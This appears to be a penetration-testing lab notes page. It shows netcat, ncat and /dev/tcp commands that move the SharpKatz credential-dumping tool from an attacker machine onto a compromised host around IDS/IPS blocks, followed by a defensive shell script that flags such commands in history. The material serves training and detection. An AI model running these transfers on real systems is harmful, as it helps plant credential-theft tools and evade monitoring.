Listener on Compromised Machine sending from Attacker
(when IDS/IPS blocks outbound traffic)
Using old original Netcat:
Start a listener on the compromised machine and write incoming data to a file:
victim@target:~$ # Example using Original Netcat
victim@target:~$ nc -l -p 8000 > SharpKatz.exe
Send the data from our attacking machine:
Momothechi@htb[/htb]$ wget -q https://github.com/Flangvik/SharpCollection/raw/master/NetFramework_4.7_x64/SharpKatz.exe
Momothechi@htb[/htb]$ # Example using Original Netcat
Momothechi@htb[/htb]$ nc -q 0 192.168.49.128 8000 < SharpKatz.exe
Using modern Ncat:
Start the listener:
victim@target:~$ # Example using Ncat
victim@target:~$ ncat -l -p 8000 --recv-only > SharpKatz.exe
Send from the attacking machine:
Momothechi@htb[/htb]$ wget -q https://github.com/Flangvik/SharpCollection/raw/master/NetFramework_4.7_x64/SharpKatz.exe
Momothechi@htb[/htb]$ # Example using Ncat
Momothechi@htb[/htb]$ ncat --send-only 192.168.49.128 8000 < SharpKatz.exe
Listener on Attacking Machine connecting from Compromised
(when IDS/IPS blocks incoming traffic)
Using old original Netcat:
Start listener with input file:
Momothechi@htb[/htb]$ # Example using Original Netcat
Momothechi@htb[/htb]$ sudo nc -l -p 443 -q 0 < SharpKatz.exe
Connect from the compromised machine:
victim@target:~$ # Example using Original Netcat
victim@target:~$ nc 192.168.49.128 443 > SharpKatz.exe
Using Ncat:
Start the listener:
Momothechi@htb[/htb]$ # Example using Ncat
Momothechi@htb[/htb]$ sudo ncat -l -p 443 --send-only < SharpKatz.exe
Connect:
victim@target:~$ # Example using Ncat
victim@target:~$ ncat 192.168.49.128 443 --recv-only > SharpKatz.exe
When we don't have Ncat/Netcat on the compromised machine, use /dev/tcp
Starting listener on attacking machine with file input:
Momothechi@htb[/htb]$ # Example using Ncat
Momothechi@htb[/htb]$ sudo ncat -l -p 443 --send-only < SharpKatz.exe
Connecting on the compromised machine using /dev/tcp:
victim@target:~$ cat < /dev/tcp/192.168.49.128/443 > SharpKatz.exe
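Detection side of the transfers above (an added example, not part of the original notes): a POSIX shell classifier that labels command lines from shell history or process auditing by the pattern they match. The label names and the sample lines (including 10.0.0.5, notes.txt and hits.txt) are constructed for illustration.

```shell
# Label one command line with the transfer pattern it matches, or "none".
classify_cmd() {
    cmd=$1
    # Bash /dev/tcp/<host>/<port> redirection: no netcat binary is executed,
    # so process-name rules never see it. Inspect the command line itself.
    if printf '%s\n' "$cmd" | grep -Eq '[<>] ?/dev/tcp/[^/ ]+/[0-9]+'; then
        echo dev-tcp-redirect; return 0
    fi
    # Command word: first token after an optional sudo, directory stripped.
    bin=$(printf '%s\n' "$cmd" | sed -E 's/^(sudo +)?([^ ]+).*/\2/; s#.*/##')
    case $bin in
        nc|ncat|netcat) ;;
        *) echo none; return 0 ;;
    esac
    # -l (alone or in a short-option cluster) or --listen marks a listener.
    role=client
    printf '%s\n' "$cmd" | grep -Eq '(^| )(-[a-zA-Z]*l|--listen)' && role=listener
    # A file redirect on stdin/stdout turns the connection into a transfer.
    if printf '%s\n' "$cmd" | grep -Eq ' < ?[^ ]'; then
        echo "$role-sends-file"
    elif printf '%s\n' "$cmd" | grep -Eq ' >>? ?[^ &]'; then
        echo "$role-writes-file"
    else
        echo "$role-no-redirect"
    fi
}

# Constructed sample command lines (not real log data).
sample_lines() {
    cat <<'EOF'
nc -l -p 8000 > SharpKatz.exe
ncat --send-only 192.168.49.128 8000 < SharpKatz.exe
sudo ncat -l -p 443 --send-only < SharpKatz.exe
cat < /dev/tcp/192.168.49.128/443 > SharpKatz.exe
grep -l nc notes.txt > hits.txt
/usr/bin/nc -zv 10.0.0.5 22
EOF
}

# Read command lines on stdin; print "label<TAB>command" for each match.
scan() {
    while IFS= read -r line; do
        label=$(classify_cmd "$line")
        [ "$label" = none ] || printf '%s\t%s\n' "$label" "$line"
    done
}

sample_lines | scan
```

The grep line is skipped because nc appears only as an argument, while the /dev/tcp line is flagged even though its command word is cat.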